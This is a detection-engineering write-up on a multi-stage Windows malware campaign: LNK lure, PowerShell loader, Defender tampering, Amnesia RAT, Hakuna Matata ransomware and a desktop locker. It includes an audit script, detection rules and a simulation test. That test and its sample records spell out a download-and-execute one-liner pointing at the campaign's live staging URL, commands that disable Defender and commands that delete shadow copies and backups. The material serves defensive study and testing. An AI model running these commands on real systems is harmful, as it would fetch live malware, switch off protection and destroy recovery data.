Inside a Multi-Stage Windows Malware Operation
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
FortiGuard Labs identified a multi-stage Windows intrusion chain that starts with a malicious LNK file delivered inside a compressed archive. The shortcut launches an initial PowerShell loader that pulls follow-on scripts from GitHub and later hands control to an obfuscated VBScript orchestrator. The workflow then attempts to weaken endpoint defenses by disabling Microsoft Defender, deploying the Defendnot utility, and staging both Amnesia RAT and Hakuna Matata ransomware. The operation concludes by dropping a WinLocker component that locks the desktop to disrupt recovery and pressure victims.
Investigation
Investigators reconstructed the execution path from the LNK-triggered PowerShell stage to a VBScript that rebuilds payloads in memory, culminating in ransomware deployment and desktop-locking behavior. Defensive measures were bypassed through targeted registry edits and by injecting a Defendnot DLL into Taskmgr.exe. Defendnot works by registering a fake antivirus product with the Windows Security Center so that Defender stands down on its own; the injection into Taskmgr.exe is needed because the Security Center only accepts that registration from a trusted, Microsoft-signed process. Persistence was implemented using a combination of HKCU Run key entries and Startup folder artifacts (a copy of 'svchost.scr') to re-trigger the chain after logon.
Mitigation
Monitor for suspicious policy-level registry changes under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender and HKCU\Software\Microsoft\Windows\CurrentVersion\Policies. Block egress to the specific GitHub and Dropbox URLs used for staging (blocking the services outright is rarely practical, so also alert on script hosts fetching from them), and alert on PowerShell download-and-execute patterns (irm or iwr piped to iex under -ExecutionPolicy Bypass) whose parent process is explorer.exe, which is how a double-clicked LNK appears in process-creation telemetry. Enforce application allow-listing and tighten PowerShell execution controls (Constrained Language Mode, script block logging) to reduce script-based initial access.
Response
If detected, isolate the endpoint and capture volatile evidence first (running processes, modules loaded in Taskmgr.exe, network connections, the contents of the Run key and Startup folder), then restore Defender-related registry settings and preferences to a known-good state and remove malicious files and persistence entries. Hunt for active Amnesia RAT processes and the Telegram Bot API traffic they generate, and validate whether ransomware execution occurred (files renamed with the @NeverMind12F extension, deleted shadow copies). Perform full forensic triage to scope impact and eradicate remnants, then recover systems from clean backups where feasible.
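The checks that the Mitigation and Response sections call for, as one added PowerShell script written for this page (it is not code from the FortiGuard report or from the detection stack listed below). It reads the two policy key paths named above and the live Defender preferences, lists HKCU Run values and Startup/ProgramData files pointing at .scr payloads, and lists modules loaded in Taskmgr.exe that are not Microsoft-signed. The specific value names it checks (DisableAntiSpyware, DisableRealtimeMonitoring, DisableBehaviorMonitoring, DisableTaskMgr, DisableRegistryTools) and the "wide exclusion" heuristic are assumptions about what this tooling sets; the page names only the key paths. Run it from an elevated session; -Remediate reverts the policy values and Defender preferences but deliberately leaves files on disk for collection.

```powershell
# Added example for this page; not the report's or the detection stack's own code.
# Audits (and with -Remediate reverts) Defender tamper state, and lists the persistence
# and injection artifacts described above. Run from an elevated PowerShell session.
# The value names and the wide-exclusion heuristic are assumptions (see lead-in).
[CmdletBinding()]
param([switch]$Remediate)

$findings = [System.Collections.Generic.List[string]]::new()

# 1. Policy-level registry values under the two keys named in the Mitigation section.
#    A value of 1 disables Defender (HKLM) or locks the user out of Task Manager and
#    Registry Editor (HKCU), which is what a desktop locker relies on.
$policyChecks = @(
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';                      Name = 'DisableAntiSpyware' }
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableRealtimeMonitoring' }
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableBehaviorMonitoring' }
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';         Name = 'DisableTaskMgr' }
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';         Name = 'DisableRegistryTools' }
)
foreach ($c in $policyChecks) {
    $item = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
    if ($null -ne $item -and $item.($c.Name) -eq 1) {
        $findings.Add("Policy tamper: $($c.Path)\$($c.Name) = 1")
        if ($Remediate) { Remove-ItemProperty -Path $c.Path -Name $c.Name -Force }
    }
}

# 2. Live Defender preferences: real-time monitoring switched off, or exclusions covering a
#    whole drive or a user-writable root (the "wide filesystem exclusions" in the Attack Flow).
$wideRoots = @($env:ProgramData, $env:USERPROFILE, $env:TEMP, 'C:\Users', 'C:\Temp') |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') }
$pref = Get-MpPreference
if ($pref.DisableRealtimeMonitoring) {
    $findings.Add('Defender real-time monitoring is disabled')
    if ($Remediate) { Set-MpPreference -DisableRealtimeMonitoring $false }
}
foreach ($ex in @($pref.ExclusionPath)) {
    if (-not $ex) { continue }
    $norm = $ex.TrimEnd('\')
    if ($norm -match '^[A-Za-z]:$' -or $wideRoots -contains $norm) {
        $findings.Add("Wide Defender exclusion: $ex")
        if ($Remediate) { Remove-MpPreference -ExclusionPath $ex }
    }
}

# 3. Persistence: HKCU Run values and Startup/ProgramData files with the .scr extension the
#    chain's payloads use (svchost.scr, TelegramWorker.scr, WmiPrvSE.scr, gedion.scr).
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$meta   = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'   # provider noise
$run    = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
foreach ($p in @($run.PSObject.Properties | Where-Object { $meta -notcontains $_.Name })) {
    if ("$($p.Value)" -match '(?i)\.scr\b') {
        $findings.Add("Run key '$($p.Name)' -> $($p.Value)")
        if ($Remediate) { Remove-ItemProperty -Path $runKey -Name $p.Name -Force }
    }
}
$startup = [Environment]::GetFolderPath('Startup')
Get-ChildItem -Path $startup, $env:ProgramData -Filter '*.scr' -File -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("Payload with .scr extension (collect before deleting): $($_.FullName)") }

# 4. Defendnot is loaded into Taskmgr.exe. Any module there that is not Microsoft-signed is
#    worth pulling for analysis. Module enumeration needs the same or higher integrity level.
foreach ($tm in @(Get-Process -Name Taskmgr -ErrorAction SilentlyContinue)) {
    try { $mods = $tm.Modules }
    catch { $findings.Add("Could not enumerate modules of Taskmgr.exe PID $($tm.Id): $_"); continue }
    foreach ($m in $mods) {
        $sig = Get-AuthenticodeSignature -FilePath $m.FileName -ErrorAction SilentlyContinue
        if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
            $findings.Add("Taskmgr.exe PID $($tm.Id) loaded non-Microsoft module: $($m.FileName)")
        }
    }
}

if ($findings.Count -eq 0) { 'No tamper, persistence or injection indicators found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

Run it once without -Remediate to record the findings for the incident timeline, then again with -Remediate after the artifacts have been collected. If Tamper Protection is enabled, Set-MpPreference may refuse to flip real-time monitoring back on; in that case the HKLM policy values are the thing to remove, since Defender re-reads them and re-enables itself.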
Attack Flow

```mermaid
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff6666

    %% Node definitions
    step_a["<b>Action</b> – <b>T1566.001 Phishing: Attachment</b><br/>LNK file 'Задание_для_бухгалтера_02отдела.txt.lnk' (Russian: 'Task for the accountant of department 02') inside a compressed archive"]
    class step_a action
    step_b["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>LNK launches PowerShell with -ExecutionPolicy Bypass to download script 'kira.ps1'"]
    class step_b action
    step_c["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/>VBScript 'SCRRC4ryuk.vbe' encoded with Script Encoder Plus, Base64 and RC4"]
    class step_c action
    step_d["<b>Action</b> – <b>T1562.001 Impair Defenses</b><br/>PowerShell disables Microsoft Defender real-time monitoring and adds wide filesystem exclusions"]
    class step_d action
    step_e["<b>Action</b> – <b>T1218.010 Regsvr32 Proxy Execution</b><br/>Defendnot DLL and loader deployed, injected into trusted Taskmgr.exe"]
    class step_e action
    step_f["<b>Action</b> – <b>T1548.002 Bypass UAC</b><br/>ShellExecute runas loop used to obtain elevated rights"]
    class step_f action
    step_g["<b>Action</b> – <b>T1547.001 Registry Run Keys / Startup Folder</b><br/>Creates HKCU\Software\Microsoft\Windows\CurrentVersion\Run entry and copies 'svchost.scr' to %PROGRAMDATA% and user Startup folder"]
    class step_g action
    step_h["<b>Action</b> – <b>T1082 System Information Discovery</b><br/>Collects OS, hardware, domain, IP information via WMI"]
    class step_h action
    step_i["<b>Action</b> – <b>T1057 Process Discovery</b><br/>Enumerates running processes to avoid duplicate execution"]
    class step_i action
    step_j["<b>Action</b> – <b>T1113 Screen Capture</b><br/>'TelegramWorker.scr' captures screenshots (1.png-30.png) and sends them via Telegram"]
    class step_j action
    step_k["<b>Action</b> – <b>T1555 Credentials from Password Stores</b><br/>Extracts Chromium browser passwords and cookies using DPAPI"]
    class step_k action
    step_l["<b>Action</b> – <b>T1539 Steal Web Session Cookie</b><br/>Harvests cookies and tokens from browsers"]
    class step_l action
    step_m["<b>Action</b> – <b>T1550.004 Use Alternate Authentication Material</b><br/>Hijacks Telegram Desktop session files from 'tdata'"]
    class step_m action
    step_n["<b>Action</b> – <b>T1102.002 Web Service</b><br/>Sends collected data and screenshots to attacker via Telegram Bot API"]
    class step_n action
    step_o["<b>Malware</b> – <b>T1486 Data Encrypted for Impact</b><br/>Hakuna Matata ransomware 'WmiPrvSE.scr' encrypts files with extension @NeverMind12F"]
    class step_o malware
    step_p["<b>Action</b> – <b>T1490 Inhibit System Recovery</b><br/>Executes 'reagentc /disable', 'wbadmin delete catalog', 'vssadmin delete shadows /all'"]
    class step_p action
    step_q["<b>Malware</b> – <b>T1499 Endpoint Denial of Service</b><br/>WinLocker 'gedion.scr' creates mutex WINLOCK… and locks the desktop"]
    class step_q malware

    %% Connections
    step_a -->|leads_to| step_b
    step_b -->|leads_to| step_c
    step_c -->|leads_to| step_d
    step_d -->|leads_to| step_e
    step_e -->|leads_to| step_f
    step_f -->|leads_to| step_g
    step_g -->|leads_to| step_h
    step_h -->|leads_to| step_i
    step_i -->|leads_to| step_j
    step_j -->|leads_to| step_k
    step_k -->|leads_to| step_l
    step_l -->|leads_to| step_m
    step_m -->|leads_to| step_n
    step_n -->|leads_to| step_o
    step_o -->|leads_to| step_p
    step_p -->|leads_to| step_q
```
Detections
- Suspicious Process Utilizes a URL in the Command Line (via cmdline)
- Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
- IOCs (HashSha256) to detect: Inside a Multi-Stage Windows Malware Campaign
- Malicious Network Activity and C2 via GitHub, Dropbox, Telegram [Windows Network Connection]
- Windows Malware Campaign PowerShell Execution [Windows Powershell]
- PowerShell and CMD Execution with Install.exe Decoy [Windows Process Creation]
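The command-line logic behind the first two detections listed above, plus the inhibit-recovery commands from the Attack Flow, applied to a handful of process-creation records. This is an added example written for this page; it is not the detection stack's own rule content, which is not reproduced here. Field names follow Sysmon Event ID 1 / Sigma (Image, ParentImage, CommandLine). The five records are constructed to mirror the chain; the exact command lines and parent processes (explorer.exe for an LNK launch, wscript.exe for the VBScript stage) are assumptions, not quotes from the report.

```powershell
# Added example for this page, modeled on the listed detections; not their actual rule logic.
# Each rule is a scriptblock over one process-creation record with Sysmon/Sigma field names.
$rules = @(
    @{ Title = 'Suspicious Process Utilizes a URL in the Command Line'
       # Only script hosts and download-capable LOLBins: a URL in git.exe or a browser is normal.
       Test  = { param($e)
                 $e.Image -match '\\(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)\.exe$' -and
                 $e.CommandLine -match '(?i)https?://' } }
    @{ Title = 'PowerShell download-and-execute from LNK launch'
       # The explorer.exe parent is what separates a double-clicked LNK from an admin console.
       Test  = { param($e)
                 $e.Image -match '\\powershell\.exe$' -and
                 $e.ParentImage -match '\\explorer\.exe$' -and
                 $e.CommandLine -match '(?i)-(ExecutionPolicy|ep)\s+Bypass' -and
                 $e.CommandLine -match '(?i)\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b' -and
                 $e.CommandLine -match '(?i)\b(iex|Invoke-Expression)\b' } }
    @{ Title = 'Disable Windows Defender Realtime Monitoring and Other Preferences Changes'
       Test  = { param($e)
                 $e.CommandLine -match '(?i)(Set|Add)-MpPreference' -and
                 $e.CommandLine -match '(?i)(DisableRealtimeMonitoring\s+\$?true|DisableBehaviorMonitoring\s+\$?true|Exclusion(Path|Extension|Process))' } }
    @{ Title = 'Inhibit System Recovery (reagentc / wbadmin / vssadmin)'
       Test  = { param($e)
                 $e.CommandLine -match '(?i)(vssadmin(\.exe)?\s+delete\s+shadows|wbadmin(\.exe)?\s+delete\s+catalog|reagentc(\.exe)?\s+/disable)' } }
)

# Constructed sample records (assumptions mirroring the Attack Flow, not quotes from the report).
$events = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm ''https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1'' | iex"' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\System32\wscript.exe'
        CommandLine = 'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\"' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\cmd.exe'; ParentImage = 'C:\ProgramData\WmiPrvSE.scr'
        CommandLine = 'cmd.exe /c vssadmin delete shadows /all /quiet & wbadmin delete catalog -quiet & reagentc /disable' }
    # Two benign records that should not fire: a git clone with a URL, and an admin status check.
    [pscustomobject]@{ Image = 'C:\Program Files\Git\cmd\git.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'git clone https://github.com/example/repo.git' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'powershell.exe -NoProfile -Command Get-MpComputerStatus' }
)

function Invoke-Rules {
    param([object[]]$Events, [object[]]$Rules)
    foreach ($e in $Events) {
        $hits = @($Rules | Where-Object { & $_.Test $e } | ForEach-Object Title)
        [pscustomobject]@{
            Image   = Split-Path $e.Image -Leaf
            Parent  = Split-Path $e.ParentImage -Leaf
            Matched = if ($hits) { $hits -join '; ' } else { '-' }
        }
    }
}

Invoke-Rules -Events $events -Rules $rules | Format-Table -AutoSize -Wrap
```

Records 1 to 3 fire (the first one on both the URL rule and the LNK-launch rule); the git clone and the status check fire nothing. In production the same scriptblocks would be fed from Sysmon Event ID 1 or Security 4688 (with command-line auditing enabled), and the parent-process condition is the piece most worth keeping: without it the download-and-execute rule fires on every administrator who pastes a one-liner.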
Simulation Execution
Prerequisite: the Telemetry & Baseline Pre-flight Check must have passed.
Rationale: this section reproduces the adversary technique (TTP) that the detection rule is built to catch. The commands and narrative mirror the TTPs identified above so that they generate the exact command-line telemetry the detection logic expects; an abstract or unrelated simulation would not exercise the rule and would give a misleading pass/fail result.
Attack Narrative & Commands:
An adversary who has gained an initial foothold on the endpoint wants to download and execute a malicious PowerShell payload while evading the default execution policy. They use Invoke-RestMethod (irm) piped into Invoke-Expression (iex) to pull a script from a remote GitHub raw URL, running it under -ExecutionPolicy Bypass. They then disable Windows Defender real-time monitoring to avoid detection of subsequent payloads. These steps generate the command-line strings that the Sigma rule watches for. Note that the URL in the script is the campaign's live staging URL: run the regression test only on an isolated lab host, or point $maliciousUrl at a harmless script on a server you control; the detection keys on the command line, not on what the downloaded script does.
Regression Test Script:
```powershell
# --------------------------------------------------------------
# Step 1 - Execute remote script with ExecutionPolicy Bypass
# --------------------------------------------------------------
# This is the campaign's live staging URL. Outside an isolated lab, point it at a
# harmless script on a host you control; the rule matches the command line, not the content.
$maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1"
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex"

# --------------------------------------------------------------
# Step 2 - Disable Windows Defender real-time monitoring
# --------------------------------------------------------------
# Requires an elevated session. Set-MpPreference is the cmdlet that changes preference
# values (there is no Disable-MpPreference). If Tamper Protection is on the change will
# not take effect, but the command line is still logged, which is what the rule observes.
Set-MpPreference -DisableRealtimeMonitoring $true
# Add an exclusion path (simulated)
Add-MpPreference -ExclusionPath "C:\Temp\ExcludeFolder"
```
Cleanup Commands:
```powershell
# Re-enable Windows Defender real-time monitoring (Set-MpPreference; there is no Enable-MpPreference)
Set-MpPreference -DisableRealtimeMonitoring $false
# Remove the exclusion path (if it exists)
Remove-MpPreference -ExclusionPath "C:\Temp\ExcludeFolder" -ErrorAction SilentlyContinue
# Stop any lingering PowerShell processes started by the script. Process.StartInfo is empty
# for processes this session did not start, so read the command line from WMI instead.
Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
    Where-Object { $_.CommandLine -match 'kira\.ps1' } |
    ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }
# Confirm the baseline is back
Get-MpPreference | Select-Object DisableRealtimeMonitoring, ExclusionPath
```